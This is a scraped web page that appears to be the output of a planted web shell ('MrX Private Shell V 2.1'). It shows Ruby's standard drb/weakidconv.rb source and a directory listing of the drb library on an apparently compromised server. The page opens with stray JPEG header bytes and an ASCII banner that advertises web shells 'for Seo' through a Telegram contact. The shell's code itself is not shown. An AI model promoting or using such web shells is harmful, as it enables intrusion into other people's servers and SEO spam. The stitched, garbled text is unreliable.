����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# frozen_string_literal: false
require_relative 'drb'
module DRb
# DRb::WeakIdConv is deprecated since 2.2.1. You don't need to use
# DRb::WeakIdConv instead of DRb::DRbIdConv. It's the same class.
#
# This file still exists for backward compatibility.
#
# To use WeakIdConv:
#
# DRb.start_service(nil, nil, {:idconv => DRb::WeakIdConv.new})
def self.const_missing(name) # :nodoc:
case name
when :WeakIdConv
warn("DRb::WeakIdConv is deprecated. " +
"You can use the DRb::DRbIdConv. " +
"You don't need to use this.",
uplevel: 1)
const_set(:WeakIdConv, DRbIdConv)
singleton_class.remove_method(:const_missing)
DRbIdConv
else
super
end
end
end
# DRb.install_id_conv(WeakIdConv.new)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| acl.rb | File | 4.61 KB | 0644 |
|
| drb.rb | File | 58.76 KB | 0644 |
|
| eq.rb | File | 275 B | 0644 |
|
| extserv.rb | File | 840 B | 0644 |
|
| extservm.rb | File | 1.8 KB | 0644 |
|
| gw.rb | File | 3 KB | 0644 |
|
| observer.rb | File | 671 B | 0644 |
|
| ssl.rb | File | 11.91 KB | 0644 |
|
| timeridconv.rb | File | 2.16 KB | 0644 |
|
| unix.rb | File | 2.78 KB | 0644 |
|
| version.rb | File | 35 B | 0644 |
|
| weakidconv.rb | File | 784 B | 0644 |
|